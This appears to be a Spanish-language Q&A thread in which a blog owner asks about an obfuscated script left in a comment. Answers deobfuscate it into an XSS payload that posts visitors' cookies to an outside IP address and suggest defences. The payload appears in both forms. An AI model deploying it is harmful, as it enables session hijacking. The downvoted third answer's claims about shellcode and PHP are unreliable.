Encontré un código ofuscado en un comentario en mi blog. ¿Qué tengo que hacer?

46

Hoy estuve revisando comentarios en mi blog y encontré un comentario extraño, aquí está el texto exacto

<script>var _0x352a=["\x31\x31\x34\x2E\x34\x35\x2E\x32\x31\x37\x2E\x33\x33\x2F\x76\x6C\x6B\x2E\x70\x68\x70","\x63\x6F\x6F\x6B\x69\x65","\x68\x74\x6D\x6C","\x70\x6F\x73\x74"];$[_0x352a[3]](_0x352a[0],{cookie:document[_0x352a[1]]},function (){} ,_0x352a[2]);</script>

¿Qué significa? ¿Es un error?

Tenga en cuenta que tuve un gran problema con XSS el verano pasado, pero un experto en seguridad lo solucionó. Hoy me puse en contacto con él y me dijo que estaba bien y que no debía preocuparme. Pero estoy preocupado.

    
pregunta Green Fly 07.08.2013 - 18:02
fuente

3 respuestas

82

En primer lugar, es probable que tu tipo de seguridad tenga razón. No parece que tengas nada de qué preocuparte porque a partir de tu descripción del problema y de la respuesta del chico, creo que las etiquetas de script estaban correctamente codificadas. Piénsalo como un arma neutralizada. Está ahí, sí, pero no puede hacer ningún daño.

La ejecución de ese código a través de un desobuscador nos da

$["post"]("114.45.217.33/vlk.php",{cookie:document["cookie"]},function(){},"html")

Ahora simplemente "beatificamos" el código para hacerlo más legible

$["post"]("114.45.217.33/vlk.php", {
    cookie: document["cookie"]
}, function () {}, "html")

Como puede ver, el atacante esperaba que su sitio fuera vulnerable a XSS para explotarlo y robar las cookies de sus visitantes, incluida la suya. También está asumiendo / esperando que estés usando jQuery, y en realidad es una suposición muy razonable en estos días. Si logran robar sus cookies, obtendrán el identificador de sesión y posiblemente ingresarán como uno de sus usuarios o incluso su cuenta de administrador.

No estoy seguro de por qué dejó la función de devolución de llamada allí o el tipo de respuesta, sin embargo. Eliminarlos habría hecho la carga útil aún más pequeña.

Ejecutar esa dirección IP a través de una herramienta de comprobación de lista negra muestra Es probable que el anfitrión se vea comprometido. Esto parece un ataque aleatorio de un robot que intenta insertar ese código en blogs y sitios aleatorios con la esperanza de que uno de ellos sea vulnerable.

    
respondido por el Adi 07.08.2013 - 18:13
fuente
19

Además de la respuesta de Adnan:

Este es un subproducto de cuando un atacante borra tu aplicación (simplemente envía toneladas de cargas útiles para ver si una funciona). Si su aplicación maneja la codificación y el escape de la entrada del usuario correctamente, no debe preocuparse por ser vulnerable.

Hay algunas contramedidas que puede tomar para reducir estos ataques, como el uso de un firewall de aplicaciones web o un sistema de detección de intrusos. Estos deberían bloquear automáticamente a las personas que están borrando su aplicación. También puede requerir una forma de verificación de la realidad como un captcha o un desafío antes de permitir la publicación (o si se detectan muchas publicaciones secuenciales). Esto también reduce este tipo de contaminación.

    
respondido por el Lucas Kauffman 07.08.2013 - 19:02
fuente
-7

Esto es lo que puedo entender.

Está codificado en hexadecimal. El valor real está en ascii.

\ x significa que se estaba utilizando como código de shell. El usuario malintencionado intentó enviar valores de Unicode codificados en formato hexadecimal como comentario envuelto en una función php para interactuar con su servidor y comprometerlo.

Parece que falló, ya que se detectó como un comentario sin romper nada en tu blog. Pero esto también significa que puede haber alguna vulnerabilidad en cualquiera de los componentes que está utilizando en su blog. Lo bueno es consultar el sitio web de NVD o Cvedetails.com y ver si hay algunos errores nuevos en los componentes que estás usando en tu blog.

También existe una alta posibilidad de que un atacante sea un skiddie y él simplemente atacó tu blog al ver que es el mismo software (no la versión;)).

    
respondido por el oldnoob 07.08.2013 - 18:24
fuente

Lea otras preguntas en las etiquetas